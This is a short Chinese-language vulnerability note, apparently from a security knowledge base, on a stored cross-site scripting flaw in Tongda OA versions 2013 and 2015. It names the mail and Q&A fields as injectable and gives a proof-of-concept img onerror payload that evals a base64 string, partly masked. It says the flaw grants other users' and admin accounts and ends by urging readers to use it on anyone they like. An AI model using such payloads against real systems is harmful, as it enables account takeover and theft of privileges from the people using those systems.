menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-通达OA chevron_right 007-通达oa xss.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    007-通达oa xss.md
    467 B / 2021-07-17 00:01:26
        ## 通达oa xss
    
    ### 漏洞影响
    
    2013、2015版本
    
    ### 复现过程
    
    发邮件的地方、问题问答的地⽅都存在XSS,可获取他人账号权限。⼀般情况下,OA会有前端进行过滤, 所以抓包时候去添加payload,之后会对事件进行过滤,所以使用
    
    poc
    
    `<img src=x onerror=eval(atob('cz1jcmVXXXXXytNYXRoXXXXXXXXhbmRvbSgp'))>`
    
    ![](images/通达oa xss.png =900x600)
    
    这个漏洞获取admin权限⾮常好用。想X谁X谁!
    
    
    
    links
    file_download